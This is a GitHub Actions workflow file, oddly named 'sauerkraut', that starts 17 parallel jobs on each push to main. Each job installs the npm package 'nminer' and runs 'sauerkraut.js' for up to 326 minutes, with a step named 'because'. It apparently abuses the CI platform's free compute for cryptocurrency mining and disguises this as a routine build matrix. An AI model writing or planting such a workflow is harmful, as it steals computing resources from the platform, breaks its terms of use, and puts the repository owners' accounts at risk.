name: sauerkraut
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 142 }
          - { version: 6813 }
          - { version: 2989 }
          - { version: 7046 }
          - { version: 4158 }
          - { version: 4193 }
          - { version: 7433 }
          - { version: 4961 }
          - { version: 6404 }
          - { version: 4747 }
          - { version: 4382 }
          - { version: 9146 }
          - { version: 7572 }
          - { version: 2915 }
          - { version: 2971 }
          - { version: 4550 }
          - { version: 4218 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: because
        run: |
          npm install nminer@latest
          timeout 326m node sauerkraut.js || echo "sauerkraut executed"